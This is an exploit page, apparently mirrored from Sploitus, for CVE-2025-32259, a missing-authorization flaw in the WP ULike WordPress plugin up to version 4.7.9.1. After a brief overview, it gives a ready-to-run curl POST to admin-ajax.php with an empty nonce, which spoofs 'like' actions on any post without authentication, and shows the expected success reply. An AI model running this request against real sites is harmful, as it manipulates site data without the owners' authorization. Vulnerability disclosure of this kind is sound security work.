Share
## https://sploitus.com/exploit?id=EC48512C-01E6-5F02-BBF1-B19142B723F1
# WP ULike โ‰ค 4.7.9.1 - Unauthenticated Content Spoof (CVE-2025-32259)

> ๐Ÿ”ฌ A simple PoC demonstrating CVE-2025-32259 in the WP ULike plugin for WordPress.  
> ๐Ÿšจ Educational use only โ€“ do not test on systems without explicit authorization.

---

## ๐Ÿง  Overview

WP ULike is a popular WordPress plugin that allows users to like content on a site. Versions up to 4.7.9.1 suffer from a **missing authorization vulnerability**, allowing unauthenticated users to spoof "like" actions via AJAX requests.

- **CVE:** [CVE-2025-32259](https://vulners.com/cve/CVE-2025-32259)
- **Vulnerable Versions:** โ‰ค 4.7.9.1
- **Fixed Version:** 4.7.9.2

---

## ๐Ÿš€ Proof of Concept

The vulnerability allows unauthenticated users to interact with the AJAX endpoint and like any content (post, comment, etc.) without permission.

### ๐Ÿ”ง PoC Script

```bash
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Replace id=1 with a valid post ID.

A successful response might look like:
{"status":"success","msg":"You liked this."}